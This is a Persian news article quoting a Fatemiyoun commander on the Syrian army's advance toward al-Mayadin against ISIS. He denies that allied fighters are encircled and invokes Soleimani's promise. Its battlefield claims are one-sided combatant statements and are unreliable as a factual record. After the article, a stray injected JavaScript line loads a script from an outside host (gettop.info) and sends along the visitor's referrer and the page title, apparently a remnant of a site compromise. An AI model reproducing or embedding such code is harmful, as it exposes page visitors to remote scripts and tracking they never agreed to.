آغاز عملیات بزرگ نیروهای مقاومت برای آزادسازی «المیادین»؛ تحقق وعده پایان تکفیر

در روزهای گذشته اخبار و تصاویر متعددی از فعالیت و عملیات گسترده گروه تروریستی داعش در برخی مناطق اطراف دیرالزور و تدمر در رسانه‌های مختلف و شبکه‌های اجتماعی منتشر شده است. اما واقعیت ماجرا چیست؟

در روزهای گذشته اخبار و تصاویر متعددی از فعالیت و عملیات گسترده گروه تروریستی داعش در برخی مناطق اطراف دیرالزور و تدمر در رسانه‌های مختلف و شبکه‌های اجتماعی منتشر شده است.
خبر محاصره رزمندگان مقاومت در دیرالزور و همچنین سقوط چندین منطقه استراتژیک به دست این گروه تروریستی نیز در فضای اخبار تحولات سوریه دست به دست میشد و برخی کمی با تردید نسبت به دستاوردهای مقاومت و ارتش سوریه در ادامه پاکسازی کامل این کشور می‌نگریستند.

اما واقعیت ماجرا چیست؟
فرمانده لشکر فاطمیون در این رابطه به خبرنگار تسنیم گفت: ارتش سوریه و رزمندگان فاطمیون و مقاومت در ادامه عملیات‌های خود برای نابودی داعش، از سمت دیرالزور به سمت منطقه مهم و استراتژیک المیادین در حال پیشروی هستند و اکنون از این ناحیه به ١۵ کیلومتری المیادین رسیده‌اند.

فتح المیادین به دست رزمندگان مقاومت معنایش رسیدن به مرز بوکمال و بسته شدن راه اکمالاتی و تسلیحاتی داعش و آغاز نابودی کامل و پایان حیات این گروه تروریستی است.

به همین منظور داعش که خود را در نقطه پایان می‌بیند جهت نجات خود شروع به برخی تحرکات در محورهای دیگر از جمله بیابان‌های اطراف شهر دیرالزور و تدمر کرده است.

این گروه تروریستی با گسیل نیروهای خود به این منطقه و انجام عملیات‌های تروریستی بدون هدف فقط سعی در ایجاد اخلال در حرکت رزمندگان مقاومت به سمت المیادین دارد.

فرمانده لشکر فاطمیون که هم‌اکنون در این منطقه عملیاتی حضور دارد در این رابطه به خبرنگار تسنیم می‌گوید: تحرکات داعش برای جلوگیری از فتح المیادین و انجام اقدامات تروریستی در بیابان‌های دیرالزور در واقع مانند حرکات گربه‌ای است که در قفسی مانده و برای نجات خود به در و دیوار می‌زند و به هر چیزی چنگ می‌اندازد اما هیچ راه فراری ندارد و نابود خواهد شد.

وی در ادامه افزود: برخی خبر از محاصره رزمندگان غیور فاطمیون و رزمندگان مقاومت و ارتش سوریه در دیرالزور می‌دهند که این موضوع کذب محض است. همین حالا تمامی رزمندگان فاطمیون و رزمندگان مقاومت و ارتش سوریه در نقاط مختلف این منطقه در تردد هستند و حتی یک نیروی محور مقاومت در محاصره این گروه تروریستی قرار ندارد.

فرمانده فاطمیون با اشاره به سخنان سرلشکر سلیمانی فرمانده نیروی قدس سپاه اظهار داشت: اکنون به سمت المیادین در حال پیشروی هستیم و به زودی با فتح این منطقه و رسیدن به مرز بوکمال وعده حاج قاسم عزیز برای نابودی داعش آن هم به دست فرزندان حضرت فاطمه در لشکر فاطمیون و رزمندگان مقاومت و ارتش سوریه محقق خواهد شد. فضای خاصی ایجاد شده و همه رزمندگان فاطمیون و رزمندگان مقاومت و ارتش سوریه هم‌قسم شده‌اند تا تحقق این وعده بزرگ برای نابودی کامل داعش و تأمین کامل امنیت حرم عمه سادات در میدان نبرد از جان مایه بگذارند.

وی در پایان گفت: اکنون هیچ رزمنده‌ای حاضر به ترک میدان نیست و همه برای ثبت این حادثه بزرگ تاریخی از هم سبقت می‌گیرند و کار داعش به دست فاطمیون و رزمندگان مقاومت و ارتش سوریه تمام خواهد شد.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *